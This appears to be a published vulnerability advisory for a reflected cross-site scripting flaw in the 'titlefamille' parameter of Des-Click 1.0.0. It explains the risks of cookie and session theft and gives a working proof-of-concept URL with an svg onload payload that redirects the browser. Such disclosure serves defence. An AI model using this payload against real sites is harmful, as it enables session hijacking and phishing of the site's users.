# Title: Des-Click 1.0.0 - Reflective Cross-Site Scripting # Date: 2020-02-09 # Author: Mizaru # Vendor Homepage: https://www.des-click.com/ # Tested on: Windows 10 / Linux # Versions: 1.0.0 # Vulnerable Parameter: "titlefamille" (Get Method) # CVE: None # Notes: # An attacker can use XSS (in titlefamille parameter des-click 1.0.0) # to send a malicious script to an unsuspecting Admins or users. The # end admins or useras browser has no way to know that the script should not # be trusted (Same Origin Policy), and will execute the script. Because it thinks the script came # from a trusted source, the malicious script can access any cookies, session # tokens, or other sensitive information retained by the browser and used # with that site. These scripts can even rewrite the content of the HTML # page. Even an attacker can easily place users in social engineering through # this vulnerability and create a fake field. # PoC: # Go to the page through this path: http://localhost/id_famille=1&id_grp=1&titlefamille= # Add the "titlefamille" parameter to the URL and write malicious code, Example: http://localhost/id_famille=1&id_grp=1&titlefamille="><svg/onload=document.location.href="https://github.com/sMizaru"> #This code will redirect you to my github page. #Some malicious code will be detected by the WAF of the web application (if the server have a WAF). #Big thanks to Smog (https://twitter.com/Sm0g3uh)